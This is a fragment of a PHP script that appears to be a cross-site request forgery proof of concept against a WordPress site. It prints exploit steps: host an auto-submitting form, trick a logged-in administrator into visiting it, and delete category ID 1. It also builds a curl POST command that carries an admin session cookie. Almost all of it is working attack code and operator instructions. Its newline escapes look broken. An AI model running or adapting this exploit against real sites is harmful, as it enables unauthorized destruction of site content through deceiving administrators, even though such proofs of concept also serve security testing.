echo "Payload Parameters:n";
print_r($csrf_payload);
echo "nnTo exploit:n";
echo "1. Save the HTML form above as an .html filen";
echo "2. Host it on any web servern";
echo "3. Trick an administrator to visit the page while logged inn";
echo "4. The form will auto-submit and delete category ID 1n";

// Alternative: Direct cURL demonstration (for testing)
echo "nnDirect cURL command for testing:n";
$curl_cmd = "curl -X POST '" . $target_url . "' \
    -H 'Content-Type: application/x-www-form-urlencoded' \
    -d '" . http_build_query($csrf_payload) . "' \
    --cookie 'wordpress_logged_in_[hash]=[admin_cookie]'";

echo $curl_cmd . "n";
?>